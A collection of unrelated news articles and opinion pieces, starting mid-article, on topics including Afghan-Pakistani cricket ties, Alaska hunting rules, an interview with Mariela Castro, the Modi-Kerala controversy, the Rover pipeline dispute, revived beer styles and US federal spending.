"I am happy to have great discussion with Pakistan Cricket Board and agreed on various plans. We are renewing this relation with a friendly match between Pakistan and Afghanistan in Kabul and then we will return to Pakistan to play one. We have also agreed to play a bilateral series for which dates will be decided later."
The ACB had arranged a similar deal in 2013 which the Afghanistan cricketers were given access to the National Cricket Academy in Lahore. But, after the first few visits, complications arose. Eventually, the ACB had to find an alternative venue - Greater Noida in India - to help their players prepare and host international teams.
Afghanistan were the first international team to visit Pakistan since the 2009 attacks in Lahore and had been part of the domestic T20 competition in Karachi in 2013. They were in talks to play in Pakistan in April 2016 but the Pakistan government had reportedly advised against the series after an attack in a recreational park in Lahore.
Mashal is aware of the challenges before both the ACB and the PCB but was eager to renew ties. "We know there is tension in the border but it's my job as chairman of Afghanistan cricket board to keep this interaction between two cricketing nations going and to help governments start something positive.
"We are trying our best to keep sports, especially cricket, away from politics as well as looking for our national interest. Still, sports is sports and we should use this as a tool to influence the politics arena positively and create a good atmosphere between two friendly and brotherly nations."
These talks, Mashal said, won't have any bearing on Afghanistan's existing ties with India. "Relation with Pakistan doesn't mean we don't have relation with India. They are also a strategic partner, a friend and they also support Afghanistan cricket. Pakistan did a great job in the development of Afghanistan cricket and we value both nations."
THE CANADIAN PRESS
OTTAWA — Public servants were asked to use official government Twitter feeds to promote Prime Minister Stephen Harper's recently announced tax measures, using the slogan “Strong Families.”
A senior bureaucrat with the Finance department sent out a mass email across government asking organizations to retweet messages about the announcement using the hashtag #StrongFamilies.
“We ask that your organization re-tweet the Department of Finance tweets from @financecanada on the announcement over the following 72 hours,” wrote Jean-Michel Catta, an assistant deputy minister.
“Most of our tweets will contain the hashtags #StrongFamilies ou #Famillesfortes.”
The proposal, which includes income splitting for families with children under 18 and extending the monthly Universal Child Care Benefit to more taxpayers, has not yet received parliamentary approval.
Both the NDP and the Liberals have been sharply critical of the income-splitting plan, which they say will benefit only 15 per cent of Canadian families.
Liberal finance critic Scott Brison argues the tweets are partisan, and shouldn't be promoted by public servants. The government is again spending money to advertise the proposal on TV and radio, even before it is voted on, he noted.
“It shows again that the Conservatives don't understand the principle of a professional public service separated from partisan politics,” Brison said.
One individual tweeted back at the department, asking, “Since when are you an arm of the CPC advertising group?”
Finance spokesman David Barnabe said the directive was sent to departmental heads of communication “for use with their official social media channels, which is common practice to broaden government messaging.”
Harper used the phrase “strong families” during the 2011 election campaign when he first promised the measures, and then again during a partisan speech to Conservatives this summer in Calgary.
Several government departments retweeted the information and hashtag about Harper's measures, including Aboriginal Affairs, Natural Resources, Health Canada and Agriculture.
New rules would ban ‘non-subsistence' killing of bears, wolves and coyotes – some of the ‘most iconic yet persecuted species'– in the state's 16 wildlife refuges
A group of scientists has backed a federal plan to restrict the trapping and gunning down of bears and wolves in Alaska's wildlife refuges, in the face of bitter opposition from the state government.
Whale hunting in Alaska: Point Hope, the village caught between tradition and climate change Read more
The US Fish and Wildlife Service (USFWS) has proposed an overhaul of hunting regulations for Alaska's 16 national wildlife refuges, which span nearly 77m acres of wilderness in the state.
The new rules would effectively ban “non-subsistence” slaughter of predators within the refuges without a sound scientific reason. Practices to be outlawed include the killing of bear cubs or their mothers, the controversial practice of bear baiting and the targeting of wolves and coyotes during the spring and summer denning season.
Anyone hoping to take a plane or helicopter to shoot a bear will also be unable to do so. These changes have been backed by a group of 31 leading scientists who said the current hunting laws hurt some of the “most iconic yet persecuted species in North America: grizzly bears, black bears and wolves”.
In a letter sent for the USFWS's public comment process, the biologists and ecologists from across the US point out that research shows that killing the predators of moose and caribou does very little to boost their numbers.
“Alaska's many-decades program of statewide carnivore persecution has failed to yield more ungulates for human hunters,” the letter states. “Furthermore, the methods of predator persecution are seen as problematic by a clear majority of Alaska's citizens.”
Alaska stepped up the trapping and shooting of predator animals after the Republican governor Frank Murkowski gained power in 2002. His successors, including Sarah Palin, have all supported a policy of “intensive management” that removes wolves and bears with the goal of boosting moose and caribou numbers for hunters.
The state has increasingly clashed with federal agencies over this policy. The situation escalated after the Alaska board of game removed a 122 sq mile buffer zone protecting wolves around the Denali national park – the US's largest national park – and allowed the baiting of bears and the use of lights to rouse hibernating bears so that they can be shot as they emerge.
Alaska recently offered its support to a moose hunter who won a supreme court appeal against the federal government over his use of a hovercraft in an ecologically sensitive area.
“We have a fiscal crisis here in Alaska but we see a large amount of money spent on ineffective hunting policies,” said Francis Mauer, retired wildlife biologist at the USFWS and one of the letter's signatories.
“The hunting guys have total control of the board of game, there's no balance there. The state has aggressively increased the killing of predators to the point where anyone can kill 10 wolves a day for 345 days of the year.
“This kind of approach isn't supported by the science, nor is it legitimate for these refuges to be converted into areas for hunting. We have seen wolf and bear numbers reduce in some areas at a time where there is increasing scientific evidence showing the value of them in maintaining healthy ecosystems.”
Alaska's administration has said it “strongly opposes” the new USFWS regulations, arguing that they are federal overreach, undermine the state's ability to manage wildlife populations and hurt native populations who rely upon moose and caribou for food.
“Ultimately, the new regulations would have significant impacts on Alaskans, particularly those living a subsistence way of life,” said Bruce Dale, director of the division of wildlife conservation.
Hillary Clinton and the Democratic Party raised $154 million in September, the Clinton campaign announced on Saturday, and enter the final weeks of the presidential campaign with a combined cash reserve of $150 million.
Mrs. Clinton's campaign took in $84 million last month, which officials said was the best fund-raising month of the campaign. The figures leave Mrs. Clinton well positioned for a final spending splurge on television, digital outreach and field mobilization as polls show her moving slightly ahead of Donald J. Trump.
The figures show Mrs. Clinton behind the blazing pace set by President Obama in his 2012 re-election bid, when Mr. Obama and the Democrats raised $181 million in September.
In past months, Mrs. Clinton has performed less well with small donors than Mr. Obama and her former rival Senator Bernie Sanders of Vermont had.
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: We return to my conversation with Mariela Castro, the daughter of Cuban President Raúl Castro. I asked her about the Cuban Five, the five men convicted in 2001 for spying on violent anti-Castro militants in the United States.
MARIELA CASTRO: [translated] As part of the Cuban population, I am committed to fighting for the liberation of the five Cubans, in this case, four Cubans who are imprisoned and one who is out on probation in Miami. And, really, they are serving very severe sentences that do not correspond with the evidence. There is no evidence for such severe sentences. If they had been tried justly, they would have already completed their sentences. And yet, they are still prisoners.
AMY GOODMAN: I dare say most Americans don't even know who they are, why they're in jail. Can you explain?
MARIELA CASTRO: [translated] It has been silenced because it is a kind of political vendetta. You know that Cuba, since the beginning of the revolution, has been the victim of terrorist attempts, organized and perpetrated by terrorist groups based in Miami of Cubans who have even confessed to be killers. They have confessed their crimes, even in books that have been published and in interviews on television. But they have not been brought to justice. However, Cuba has more than 5,000 victims of state terrorism between the dead and the wounded. Thus, as a society, as a sovereign nation, we have the right to defend ourselves, and we do it peacefully.
How? Infiltrating Cuban people who identify with the revolution, infiltrating them into these terrorist groups to alert the Cuban government as to when these terrorist attacks were going to take place, in order to be able to thwart the attempts and defend our population. These terrorist groups enjoy great economic and political power in Florida, and thus, judgments were made that violate the laws of the United States, and they were made in Miami by totally partial judges who oppose the process of the Cuban Revolution.
AMY GOODMAN: Would the Cuban government be open to a prisoner swap, the Cuban Five for Alan Gross, who has been imprisoned by the Cuban government?
MARIELA CASTRO: [translated] The Cuban government has expressed interest in finding a negotiated solution on humanitarian terms, and of course it is fully disposed to negotiate with the government of the United States. But it has not received any response.
AMY GOODMAN: Cuban-American Congress members in the United States have condemned the Obama administration for giving you a visa into the United States. Díaz-Balart, Congressman Díaz-Balart, said, “It is appalling that the Obama administration is welcoming high-level agents of the Castro dictatorship onto U.S. soil. While the Cuban people are struggling for basic freedoms in the face of increasingly brutal repression…”
Ileana Ros-Lehtinen says, “Mariela Castro is part of a ruthless dictatorship that has oppressed the Cuban people for more than half a century. She wants to spew [out] the lies and propaganda of her family's failed regime and doesn't want to answer questions from a free and independent media.”
MARIELA CASTRO: [translated] I am not going to respond to the mediocre yellow press that she tries to impose on me, which for 50 years has spread lies about the Cuban Revolution. I also want to say about these Cuban congresspeople that you mentioned, everyone in the United States and Cuba knows that they promote laws that violate the rights of Americans to travel to Cuba, that violate the rights of the Cuban community and Cuban descendants in the United States, who are 1.8 million people, to travel freely to Cuba to reunite with their families. These people are constantly promoting legislation that worsens the economic blockade. And with the revolutionary government of these more than 50 years, the Cuban people have found freedom and full justice.
AMY GOODMAN: You've been allowed into the United States under the Bush administration.
MARIELA CASTRO: [translated] I entered in 2002 for another congress in Los Angeles.
AMY GOODMAN: What would a lifting of the U.S. embargo against Cuba mean for your country, Mariela Castro?
MARIELA CASTRO: [translated] In the first place, it would mean that the government of the United States would begin to respect international law. It would mean the beginning of the end of one of the worst human rights violations: that suffered by the Cuban people because of the blockade. For Cuba, it would mean access to development that has been limited by the blockade. And Americans and Cubans could meet in friendship, without the mediation of these unscrupulous congresspeople who manipulate the policy of the United States towards Cuba in service of their personal power and economic interests, and not in function of the necessities of the Cuban people both within Cuba and beyond.
AMY GOODMAN: Your father, President Castro, has been making a transition in Cuba. Can you talk about the changes that you think are most important for people in the United States to understand?
MARIELA CASTRO: [translated] One of the most important changes is that the new economic and social strategy has been designed with the full participation of all the Cuban population, who have participated in the debates, both to question the current reality and to propose what changes should be made.
AMY GOODMAN: There is a lot of discussion of a post-Castro Cuba. What do you think that would look like?
MARIELA CASTRO: [translated] The same—with the same strategy of socialist development, which is always looking for more efficient mechanisms to support social justice and national sovereignty, and also with new public figures, because there are many people participating in Cuba in all the decisions. So that would mean new faces for the media. But for Cubans, those faces would not be new.
AMY GOODMAN: Would you consider the presidency of Cuba?
MARIELA CASTRO: [translated] No. That job doesn't interest me.
AMY GOODMAN: Why?
MARIELA CASTRO: [translated] I like my job.
AMY GOODMAN: There are other socialist governments in Latin America—Bolivia, Venezuela—where there are elections. Would Cuba go in that direction?
MARIELA CASTRO: [translated] I think Cuba has publicly expressed what the mechanisms of popular election will be, and what is being proposed is to perfect them, not repeat what others do.
AMY GOODMAN: What would it look like?
MARIELA CASTRO: [translated] Well, how we do it now is through mechanisms of popular election. It is the people who nominate their leaders. Term limits have been established, and the president, my father, is included in these term limits. This has been the result of a collective discussion, to give opportunities to others, so that they assume their responsibilities. And the mechanisms of control are being perfected so that the people have access to the control of the mechanisms of power.
AMY GOODMAN: How is the health of your uncle, Fidel Castro?
MARIELA CASTRO: [translated] I just want to add, in Cuba, we don't have electoral campaigns, and the Communist Party doesn't field candidates. And the leaders don't receive an additional salary. And the legislators don't receive an additional salary, because they are still doing their jobs. So positions of power in Cuba do not generate economic interests in people.
Fidel looks like he's doing really well. He is an octogenarian, so he doesn't have the same vitality that characterized him his whole life—that where there was a problem, Fidel was there with the people looking for solutions; that where there was a threat or danger, Fidel was right there in front of his people. Fidel is now giving us the privilege of his writing, of the writing of history. There are things that only he knows. And he is giving us a marvelous historical legacy that gives the Cuban people a spiritual strength that is priceless.
AMY GOODMAN: How did he manage to survive? I believe it's more than 600 assassination attempts by the United States, at least hundreds. The CIA documents many of them.
MARIELA CASTRO: [translated] I think it was three things. First, his charisma and his sense of justice convinced even his executioners. Above all, he was the leader of the Cuban people, he is the maximum leader of the Cuban people, and the people have always protected him. But he is also a third world leader. And in the countries that he visited where they organized the attempts, mostly organized by the CIA, these same populations protected him.
AMY GOODMAN: What is your assessment of President Obama?
MARIELA CASTRO: [translated] President Obama represents an imperialist government and policy. So if you were to say to me, “Do you prefer him? Would you like him as a president?” I would say I would prefer a president who responds to the interests of the American people, who protects the poor from the arbitrary actions of the rich, and that respects international law. I have a very personal impression that Obama is a person who tries to be just. But while occupying the position of the presidency of the United States, it is very difficult to be just. However, I am a person who always likes to think positively, and I would like to believe that Obama in a second term will be a better human being and a better president.
AMY GOODMAN: You mentioned issues of poverty and equality. What is your assessment of the Occupy movement in the United States?
MARIELA CASTRO: [translated] It's very interesting to me how the American population has found new languages and forms of struggle, a new language of struggle to fight for their social demands. And they do it peacefully and with deep reasoning. I don't think they are against the government. They are against the policies that violate their rights. And I feel admiration for the courage of these people.
AMY GOODMAN: What would you like to see most change about the United States?
MARIELA CASTRO: [translated] I want the Cuban Five to go back to Cuba and for Alan Gross to go home. I want an end to the financial, commercial and economic blockade that violates the human rights of the Cuban people, and the normalization of relations between both countries.
AMY GOODMAN: And what would you like to see most change about Cuba?
MARIELA CASTRO: [translated] In Cuba, I want to see the socialist system strengthened with mechanisms that are always more participatory and democratic, and that the sovereignty of Cuba always be respected.
AMY GOODMAN: Mariela Castro, daughter of the Cuban president, Raúl Castro. She is the most prominent champion of gay, lesbian and transgender rights in Cuba. She called on the United States to release the five Cubans imprisoned here in the U.S. They were spying on anti-Cuban militants in the U.S. In exchange, she says, Cuba should release Alan Gross, a U.S. citizen jailed in Cuba.
Please turn on JavaScript. Media requires JavaScript to play. Pope Benedict XVI says the clerical child abuse scandal shows that the greatest threat to Catholicism comes from "sin within" the Church. He made his comments in response to a question while en route to Portugal. Critics have previously accused the Vatican of attempting to blame the media and the Church's opponents for the escalation of the scandal. But the Pope made clear its origin came from within the Church itself, and said forgiveness "does not replace justice". 'Need for penance' "Today we see in a truly terrifying way that the greatest persecution of the Church does not come from outside enemies, but is born of sin within the Church," the pontiff told reporters on a plane bound for Portugal. His comments were his most direct response to media questions, and some of his strongest words yet on the abuse scandal, says BBC Vatican correspondent David Willey, who is travelling with the Pope. Benedict said the Church has "a very deep need" to acknowledge that it must do penance for its sins and "accept purification". However, he added that forgiveness should not be a substitute for justice. There has been a wave of allegations in the past few months that Church authorities in Europe and North and South America failed to deal properly with priests accused of child sex abuse, sometimes just moving them to new parishes where more children were put at risk. The Pope himself has been accused of being part of a culture of secrecy, and of not taking strong enough steps against paedophiles when he had that responsibility as a cardinal in Rome. However, his supporters say he has been the most pro-active pope yet in confronting abuse. 'Spiritual crisis' The Pope later on Tuesday landed at Lisbon, the capital, despite fears that the volcanic ash cloud affecting flights in the region would disrupt his plans. Portugal is the site of one of Europe's most popular shrines, at Fatima He celebrated an open-air Mass before a crowd of about 80,000 people in the city. Benedict told the crowd that nothing could destroy the Catholic Church. "The resurrection of Christ assures us that no adverse power will ever be able to destroy the Church," the Pope said during his address the banks of the Tagus river. During his four-day trip the pontiff was also due to celebrate Mass at the Catholic shrine of Fatima, and in Oporto. Church officials say he will address Europe's spiritual and economic crisis. Although nearly 90% of people in Portugal are reported to be Catholics, only about 20% attend Mass regularly, the BBC's Vatican correspondent, David Willey, reports from Lisbon. Pope Benedict intended to tell the Portuguese to seek solace in their faith to relieve the gloom of financial hardship, he says. Carlos Azevedo, the auxiliary bishop of Lisbon and the co-ordinator of the papal visit, said on Monday that the pontiff will speak about "the joy of faith and hope". "The moral values guiding the economy and politics show that there is a spiritual crisis," he said. Portugal has been one of the countries worst affected by the economic problems troubling many European states. The highlight of the trip is a visit to Fatima on Wednesday and Thursday, where a giant outdoor Mass has been planned for as many as 500,000 people. Fatima is one of the main sites of Christian pilgrimage in Europe. The Pope will be marking the anniversary of the day in 1917 when three Portuguese shepherd children reported having visions of the Virgin Mary in Fatima.
Bookmark with: Delicious
Digg
reddit
Facebook
StumbleUpon What are these? E-mail this to a friend Printable version
Vegan Author Schools News Anchors
December 3, 2014
In the greenroom just before this TV interview, a producer gently warned me that the anchors would likely take a tough stance against my book, Vegan Is Love.
I imagine that she, the producer, had taken in my small stature, the cuteness of my book cover, and had suddenly felt badly about throwing an innocent little children's book author to the wolves.
"It's okay," I told her, playing soft. Secretly, I was already hardened from my FOX interview, plus I had just returned from a health conference. I was feeling pretty damn sharp.
The anchors, of course, went in as they do. Along with other feigned concerns about protein and ostracization, they suggested that Vegan Is Love might fall into the category of things parents do to "traumatize" children at an early age.
By the end of the interview, as I stepped off the stage, I could feel it had not gone as expected by any of the KTLA staff...enjoy it!
Love,
Ruby
P.S. Today is the LAST DAY to save 50% on all my limited edition art prints from Vegan Is Love and That's Why We Don't Eat Animals. These prints are reminders of our love for animals and the planet—a gift that lasts forever! Hurry, the sale ends tonight at 6p PST!
Twitter users have responded with hashtag #PoMoneModi (Get lost Modi), a take off from the Mohanlal starrer, which features the famous punch line “Po Mone Dinesha” to ridicule some of the characters of his hit film ‘Narasimham'.
Escalating his attack on Prime Minister Narendra Modi for his controversial comparison of Kerala with Somalia, Chief Minister Oommen Chandy Thursday said the state government is considering legal action against him.
Advertising
As Modi faced more heat from the Congress and CPI-M for his remark, Chandy said he has “humiliated” Keralites the world over and that people of the state expected an unconditional apology from him and not his silence after it whipped up a controversy. Chandy also again asked Modi to withdraw the remark.
CPI-M said the situation in the state did not become like the African country because BJP never came to power.
[related-post]
The comparison made by Modi at a poll rally in the state early this week when he said the “infant mortality rate among the scheduled tribe community in Kerala is worse than Somalia” has set off a political storm and triggered criticism in the social media.
Advertising
Twitter users have responded with hashtag #PoMoneModi (Get lost Modi), a take off from the Mohanlal starrer, which features the famous punch line “Po Mone Dinesha” to ridicule some of the characters of his hit film ‘Narasimham'.
“He is the Prime Minister of the country…He humiliated the people of Kerala by comparing the state with Somalia. We see it very seriously. The Prime Minister made statement based on certain media reports…It is wrong..,” Chandy told a meet-the-press programme, organised by the Ernakulam press club in Kochi.
“Since he is the Prime Minister, he should have checked official records before making such statements. We are planning to take legal action (against the Prime Minister). Moving the Election Commission on this issue is also in our consideration,” Chandy said.
Earlier in the day, in his Facebook post, Chandy, who had shot off a protest letter to PM on the issue, accused Modi of keeping mum on the controversy during his rally at Thrippunithura near Kochi late evening on Wednesday.
Stating that Kerala is far ahead than BJP-ruled Gujarat in addressing infant mortality rate and issue of malnutrition, the chief minister said what Keralites want is not his silence, but an unconditional apology from the Prime Minister.
“We are No 1 in Human Development Index while Gujarat is placed at 11th position. The Prime Minister should give us an explanation,” he said.
Chandy said Modi left the election campaign rally Wednesday without answering his questions.
“It could be due to the wide criticism he had received not only from the state, but also from the Malayali community world over,” Chandy said.
Attacking Modi for his Somalia remarks, CPI(M) State Secretary Kodiyeri Balakrishnan said “one thing the Prime Minister should understand is that the state has no such situation as in Somalia because, BJP has never come to power.”
“Modi's statement would result in a setback to BJP in the ensuing polls as it has insulted the people of the state,” he told reporters at Thiruvananthapuram.
In a hard-hitting letter, Chandy had lambasted Modi recently for comparing Kerala to Somalia during his poll campaign rally here, saying he has insulted the state.
He had also requested Modi to show some “political decency” by withdrawing the statement as they are “baseless and contrary to ground realities.
“The people of Kerala, whose self-pride was wounded by the Prime Minister's statement, expected an unconditional apology from him and not his silence. But it didn't happen,” he said, adding, Keralites still hoped he would withdraw his ‘Somalia' remark.
WATCH THE INDIAN EXPRESS NEWS PLAY LIST
After taking heat last fall for destroying sacred sites of the Standing Rock Sioux Tribe, the owner of the Dakota Access pipeline finds itself embattled anew over the preservation of historic sites, this time in Ohio.
Documents filed with the Federal Energy Regulatory Commission (FERC) show that Energy Transfer Partners is in the midst of a dispute with the Ohio State Historic Preservation Office over a $1.5 million annual payment owed to the state agency as part of a five-year agreement signed in February.
Energy Transfer Partners was set to pay the preservation office in exchange for bulldozing the Stoneman House, a historic home built in 1843 in Dennison, Ohio, whose razing occurred duing construction of the Rover pipeline. Rover is set to carry natural gas obtained via hydraulic fracturing (“fracking”) from the Utica Shale and Marcellus Shale — up to 14 percent of it — through the state of Ohio. The pipeline owner initially bulldozed the historic home, located near a compressor station, without notifying FERC, as the law requires.
FERC provides regulatory and permitting oversight for interstate pipeline projects like Rover, and as a result, is tasked with performing an environmental and cultural review. Because Energy Transfer Partners didn't notify the commission of the plan to tear down the historic home, citizens and other concerned stakeholders, including the Ohio State Historic Preservation Office, did not have the ability to file a formal protest of the action.
“Negative Regional PR ”
In May 2015, Energy Transfer Partners purchased the Stoneman House from the Ohio State Historic Preservation Office for $1.3 million and bulldozed it just two weeks later, according to FERC documents. The $1.5 million annual payment owed to the Ohio State Historic Preservation Office was in addition to the initial cost of purchasing the home.
The annual payments were supposed to go toward history education programs administered by the office, as agreed upon by FERC, the Advisory Council on Historic Preservation, Energy Transfer Partners, and the Ohio State Historic Preservation Office.
Credit: U.S. Federal Energy Regulatory Commission
In a March 2015 email, an Energy Transfer Partners employee, whose name is redacted in a filing docketed with FERC, acknowledged that bulldozing the home could create “negative regional PR.”
“I agree that tearing down the house could be a politically risky strategy,” wrote the official. “[I]t may negatively affect the relationships with our reviewers and possibly result in some negative regional PR. We also told FERC that we would work with the [State Historic Preservation Office] to get to a place where there was no adverse effect.”
Asking for Dispute Resolution
In the past few weeks, FERC, Energy Transfer Partners, and the Ohio State Historic Preservation Office have exchanged several letters related to the conflict over payment owed for razing the Stoneman House, which the parties agreed upon in the Memorandum of Agreement.
On April 28, Lox Logan Jr., executive director and CEO of the Ohio State Historic Preservation Office, requested that FERC help with formal dispute resolution over the issue.
“The Ohio State Historic Preservation Office has been in repeated contact with representatives from Rover LLC regarding the fulfillment” of the monetary commitments outlined in the Memorandum of Agreement [MOA], wrote Logan. “As of this date, no efforts have been made to meet those obligations. As the lead federal agency with jurisdiction over this undertaking, we are notifying you of this dispute.”
William Scherman, an attorney for the firm Gibson, Dunn & Crutcher, currently is serving as legal counsel to Energy Transfer Partners and sent his own letter, which Energy Transfer Partners provided to DeSmog, to FERC on May 10. The letter also requested that FERC step in to resolve the dispute. Scherman previously served as FERC general counsel and chief of staff under Presidents Ronald Reagan and George H.W. Bush.
“Certain facts regarding the generation and completion of the MOA and the handling of the mitigation monetary provision were misleading and in error, and therefore we do believe that there is an impasse to resolution at this time,” wrote Scherman. “Rover believes any additional contribution is unwarranted and unfair, and Rover is willing to vigorously defend itself against any attempts to leverage any additional contribution.”
Gibson, Dunn & Crutcher is a firm best known for providing legal counsel to Chevron in the ongoing litigation between attorney Steven Donziger and indigenous plaintiffs in Ecuador against Chevron. That lawsuit and complex litigation battle, which has now dragged on for nearly 25 years, centers around the legacy of oil pollution and contamination in the country.
FERC, in turn, responded on May 17 to the letters from the Preservation Office and Energy Transfer Partners, giving them a three-week dispute resolution period.
“If this dispute is not resolved by the end of that period, Commission staff will provide its recommended final decision on the dispute, along with all documentation it deems relevant to the dispute, to the [Advisory Council on Historic Preservation] for its review and comment,” reads the FERC letter.
Credit: U.S. Federal Energy Regulatory Commission | Sherry Miller
A spokesperson for Energy Transfer Partners told DeSmog that it will “decline to comment as we continue to work with all parties” on resolving the issue.
“FERC has responded to our letter. We're entering into dispute resolution with FERC at this time,” Emmy Beach, public relations manager for the Ohio State Historic Preservation Office, told DeSmog. “At this point, the matter is up to FERC to decide what happens next.”
For its part, Energy Transfer Partners has given a blanket $2.3 million payment which would go toward the Ohio State Historic Preservation Office and $1 million of it will go directly to all the 18 counties through which Rover crosses. The other $1.3 million will go toward historic preservation efforts statewide in Ohio.**
**Update: An earlier version of this article referred to a $2.3 million offer given to the Ohio State Historic Preservation Office. The money, in actuality, has already exchanged hands and has been given to the Historic Preservation Office.
“What remains in discussions with the Ohio SHPO office and the Federal Energy Regulatory Commission are requested contributions in addition to the more than $2.3 million the state received in 2016,” explained Energy Transfer Partners spokeswoman, Vicki Granado. “We will continue to work with the FERC and the Ohio SHPO in order to resolve any outstanding issues.”
Main image: Rover pipeline construction in Sherrodsville, Ohio. Credit: Sherry Miller
Last year we couldn't get enough gose, a traditional tart-and-salty German ale that suddenly hit shelves en masse with popular canned versions from Anderson Valley and Westbrook leading the charge. But it's not the only long-lost style to rise from the dead: Today's most forward-thinking breweries are looking back, referencing historic styles to draw new drinkers. By culling dusty recipes from European traditions, brewers are unlocking a new world of beer for us (forewarning: these names don't roll off the tongue as easily as “IPA”): There's gotlandsdricka, a smoked, juniper-laced farmhouse ale from an island off Sweden, brewed stateside by D.C.'s Right Proper; and kottbusser, a dark East German ale brewed with honey and molasses that's been revived by Chicago's Off Color and Loveland, Colo.'s Grimm Brothers. Or pick up a bottle of sticke alt—that's a darker, higher- ABV version of the copper-colored German altbier (look for Sticke It To The Man, brewed by Missouri's O'Fallon). Yes, these beers are unfamiliar, but brewers say the styles are as relevant in 2015 as they were hundreds of years ago. After all, there's a reason they were popular in the first place.
“We have bars that are middle-of-nowhere, crazy biker bars that run through our [historic] beer because it's drinkable,” says Russell Fruits, vice president of Grimm Brothers, which in addition to its kottbusser bottles a gratzer, a type of smoky wheat ale born in Poland. Drinkable—and different. As craft beer fans' palates become more intrepid, some want to see less common styles. Brewers with a detective streak are happy to indulge craft beer fans' taste for the unusual. “At the end of the day, I'm a big nerd. I have both this curiosity and this romantic notion about where everything came from,” says Erik Lars Myers of Hillsborough, N.C.'s Mystery Brewing, which eschews flagship beers entirely and instead pours a seasonal taproom lineup that has included arcane Scottish, German and British styles. For Mystery, that means digging deep into library stacks or Internet databases. Luckily, Myers has help from his wife, Sarah Ficke, Assistant Professor of Literature and Languages at Marymount University, who combs archives to find documents from Germany, Britain and the American South that might inspire the next Mystery beer. It was her research about Southern plantations that led to the creation of Caswell, a historic North Carolina beer that Mystery brewed with ginger, wheat, rice and N.C.-grown barley. Myers approximated the beer from recipes Ficke found in the “Confederate Receipt Book,” published in 1863, including entries for “table beer” and “spruce beer.” He updated the recipes with modern malts, but also included grains that would have been available in North Carolina at that time.
I'm generally against using any word invented during my lifetime. But "meme" actually does seem to best describe the ill-informed discussion here about Barack Obama and spending.
A meme, according to Webster, is "an idea that spreads from person to person within a culture."
And the meme here, at the moment, is that Obama's wild, uncontrolled spending is dragging a once prosperous nation into a future of indentured servitude.
Obama's opponents are constantly inventing new apocalyptic metaphors. Mitt Romney, when he was running for president last year, settled on "Obama's debt and spending inferno."
And Americans seem overwhelmingly to believe them — by more than 80 per cent, according to some polling.
The assumption also seems to underpin a lot of popular journalism. Articles here on the deranged political brinkmanship of the past few weeks would often nod toward the idea that, whatever the tactics employed by the Tea Party extremists, their primary concern about America's disastrous fiscal escalation was correct.
Well. To quote the late Sen. Daniel Patrick Moynihan, everyone's entitled to his own opinions, but not to his own facts.
And the fact is that while government spending here did seem out of control just a few years ago, it is now declining, two years in a row in fact. So is the deficit, sharply.
Hey, big spender
Also, according to the Pulitzer-prize-winning fact checkers at PolitiFact, when compared to the spending of the nine presidents who preceded him, Obama's rate of spending in his first term in office ranks at or near the bottom of the list.
Whether in raw dollars or adjusted for inflation, both George W. Bush and Ronald Reagan increased spending at a much faster clip than the current president, who is so commonly described by his conservative opponents as a free-spending socialist.
Republicans, like Ohio congressman Steve Chabot, shown here at a town hall meeting in Montgomery, have been making political hay out of U.S. budget problems this past year. Though lately the focus of the attack may be shifting as spending and the deficit continue to decline. (Associated Press)
Now, it is true that statistics on the U.S. economy comprise a dense, confusing undergrowth that most people, including most journalists, would rather not enter.
And those who are fearless enough to crawl in sometimes emerge with different conclusions.
After PolitiFact published its findings last year, and Obama's officials tweeted them, the Washington Post's fact-checking department, which is equally respected, rendered a somewhat different view. (Both organizations used data from the non-partisan Congressional Budget Office and the Office of Management and Budget).
The Post chose to judge Obama's spending in relation to the size of the U.S. economy.
By that measure, spending in 2009, when Obama took office, jumped from 20.8 per cent of GDP to 25.2 per cent, a historic high, but one that should be seen against the backdrop of a tanking economy.
Federal spending has since declined to 23.3 per cent of GDP in 2013 – still above the 40-year average, according to the CBO, but on a precipice to continue falling for the next few years, at least as a proportion of the country's economic output.
Still, the Post's assessment also defied the whole idea — the meme — that spending under Obama is "out of control."
The nanny state
The idea of Obama as a pathological spender seems to have originated early in his administration.
His detractors, especially those in the Tea Party, blamed him for two pieces of policy they despised above all else: the $787-billion stimulus package of early 2009, and the massive Wall Street bailout a few months earlier.
Thing is, the Wall Street bailout was the creation of staunch Republican and self-described "market guy" George W. Bush. He signed it into law on Oct. 3, 2008, a month before Obama won the White House and nearly four months before Obama took office.
If the stimulus package made Obama a socialist, what exactly did rushing to rescue grossly negligent private banks with hundreds of billions of taxpayer dollars make George W. Bush? (Or, for that matter, Bush's earlier decision to provide American seniors with subsidized drugs?)
In any event, the blazing central fact is that the 2008 economic meltdown, and not any single president, was responsible for the crash in revenues and the balloon in U.S. debt whose effects are being felt to this day.
Bush did what he had to do. So did Obama. But in the years since, Obama has brought both spending and the deficit down considerably.
Still, a serious spending problem remains. It's just a lot of people here don't want to talk about that aspect of it at all, let alone see it remedied.
Social Security, America's version of the Canada Pension Plan, and Medicare, under which the government pays health-care costs for Americans over the age of 65, are indeed careering out of control.
They become less sustainable every year, as the boomer generation retires and falls back on government support. Those entitlements are growing at a rate of six and seven per cent a year, well above everything else.
For obvious reasons, most Americans don't want to discuss hacking those particular programs, aging Tea Partiers included, there being no greater economic or political force than self-interest.
So, for now, Americans are taking shelter in their pet misconceptions. For example, that they are only taking out of Medicare and Social Security what they paid in over the years.
Or that sufficient savings can come from cutting "waste, fraud and abuse." Or, among conservatives, that cutting taxes will cause wild economic growth and solve everything.
Obama says his four-year old law, Obamacare, will bring health-care costs down. Republicans say it'll do the opposite. But the Obama-spender meme is embedded in that subject, too.
Recently, CNBC polled two groups. One group was asked about Obamacare, and 46 per cent of respondents is opposed. A second group was asked about the Affordable Care Act, and 36 per cent disapproved.
Obamacare, of course, IS the Affordable Care Act.
The U.S. government almost certainly needs to spend less and raise taxes if the entitled American way of life is to continue.
As Mark Zandi, chief economist at Moody's Analytics puts it: "I don't think we can realistically grow out of our long-term fiscal problems. We will need more long-term fiscal restraint and tax revenues."
Barack Obama will almost certainly be an ex-president by the time entitlements are fixed, if they ever are. And Americans will no doubt find someone else to blame for the underfunded nanny state they treasure.
The parliament of Armenia has voted to extend for seven years a bilateral agreement with the United States on preventing the proliferation of weapons of mass destruction.
A total of 104 out of the 131 deputies voted in favor of the extension on November 17.
The Armenian government approved the extension of the agreement, which was signed in 2000, on October 20.
Under the initiative, the United States provides Armenia with equipment and advice on preventing the spread of materials and technology related to nuclear, chemical, and biological weapons.
On November 16, U.S. Deputy Assistant Secretary of State for European and Eurasian Affairs Bridget Brink met with Armenian President Serzh Sarkisian to assure him that the United States "will continue to be interested in developments in the South Caucasus" under the administration of President-elect Donald Trump.
Based on reporting by Interfax and RFE/RL's Armenian Service
